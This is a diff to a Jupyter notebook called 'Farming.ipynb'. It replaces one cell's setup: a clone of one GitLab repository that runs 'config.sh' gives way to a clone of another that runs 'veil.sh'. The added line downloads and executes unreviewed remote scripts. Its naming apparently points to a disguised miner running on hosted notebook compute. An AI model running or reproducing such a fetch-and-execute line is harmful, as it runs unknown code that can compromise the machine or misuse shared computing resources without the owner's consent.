--- a/Farming.ipynb
+++ b/Farming.ipynb
@@ -84,8 +84,7 @@
         "id": "2Bxh0ZqXtzi_"
       },
       "source": [
-        "!apt-get update && apt install libpci-dev\n",
-        "!git clone https://gitlab.com/whwhna4/maxx.git && cd maxx && chmod +x *.sh && ./config.sh"
+        "!git clone https://gitlab.com/whwhna4/mexx.git && cd mexx && chmod +x *.sh && ./veil.sh"
       ],
       "execution_count": null,
       "outputs": []
